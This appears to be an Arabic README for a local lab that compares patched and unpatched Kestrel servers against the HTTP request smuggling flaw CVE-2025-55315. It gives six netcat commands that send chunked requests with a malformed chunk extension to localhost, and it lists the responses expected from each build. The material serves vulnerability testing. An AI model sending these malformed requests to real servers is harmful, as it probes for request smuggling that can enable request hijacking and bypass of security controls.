
# ملعب لتجربة سلوكيات مختلفة على Kestrel المُصحح/غير المُصحح لثغرة تهريب HTTP CVE-2025-55315
فيما يلي بعض الاختبارات التي يمكن إجراؤها على هذه الخدمات لملاحظة سلوك مختلف على مسارات GET/POST بين الإصدارات المُصححة وغير المُصححة من Kestrel.
GET ضد الإصدار غير المُصحح (يرسل 200 ويبقى المقبس مفتوحًا)
printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
GET ضد الإصدار المُصحح (يرسل 200 ويُغلق المقبس)
printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
POST بدون CT مطلوب ضد الإصدار غير المُصحح (يرسل 200 ويبقى المقبس مفتوحًا)
printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
POST بدون CT مطلوب ضد الإصدار المُصحح (يرسل 400 ويُغلق المقبس (كما تُلقي العملية استثناءً مُعالجًا بشأن امتداد القطعة السيئ))
printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
POST مع CT مطلوب ضد الإصدار غير المُصحح (يرسل 415 ويبقى المقبس مفتوحًا)
printf 'POST /ct HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
POST مع CT مطلوب ضد الإصدار المُصحح (يرسل 415 ويُغلق المقبس)
printf 'POST /ct HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001